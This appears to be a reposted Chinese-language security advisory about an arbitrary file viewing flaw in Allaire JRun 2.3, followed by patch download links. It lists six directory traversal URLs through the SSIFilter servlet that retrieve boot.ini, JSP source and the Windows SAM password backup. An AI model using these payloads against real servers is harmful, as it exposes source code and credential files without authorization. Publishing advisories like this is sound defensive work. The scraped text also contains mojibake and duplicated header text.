AllaireJRUN2.3查看任意文件漏洞_MySQL
來源:懂視網
責編:小采
時間:2020-11-09 17:09:51
AllaireJRUN2.3查看任意文件漏洞_MySQL
AllaireJRUN2.3查看任意文件漏洞_MySQL:JRun 涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 詳細: Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞��。該漏洞允許攻擊者在 WEB 服務器上查看根目錄下的任意文件的源代碼。 JRun 2.3 使用 Java Servle
導讀AllaireJRUN2.3查看任意文件漏洞_MySQL:JRun 涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 詳細: Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞�。該漏洞允許攻擊者在 WEB 服務器上查看根目錄下的任意文件的源代碼�����。 JRun 2.3 使用 Java Servle
JRun
涉及程序:
JRUN
描述:
Allaire JRUN 2.3 查看任意文件漏洞
詳細:
Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞���。該漏洞允許攻擊者在 WEB 服務器上查看根目錄下的任意文件的源代碼����。
JRun 2.3 使用 Java Servlets 解析各種各樣類型的頁面(例如:HTML, JSP等等)�����?�;趓ules.properties 和 servlets.properties 的文件設置,可能利用URL前綴"/servlet/"調用任何servlet���。
它可能使用 Jrun 的 SSIFilter servlet 在目標系統上檢索任意的文件。下列 2 個例子顯示出能被用來檢索任意的文件的 URLs :
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._
注意:假設JRun在主機“ jrun ”上運行���,端口8000。
受影響的系統:
Allaire JRun 2.3.x
解決方案:
下載并安裝補丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha
Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar
聲明:本網頁內容旨在傳播知識����,若有侵權等問題請及時與本網聯系��,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com
AllaireJRUN2.3查看任意文件漏洞_MySQL
AllaireJRUN2.3查看任意文件漏洞_MySQL:JRun 涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 詳細: Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務器上查看根目錄下的任意文件的源代碼。 JRun 2.3 使用 Java Servle
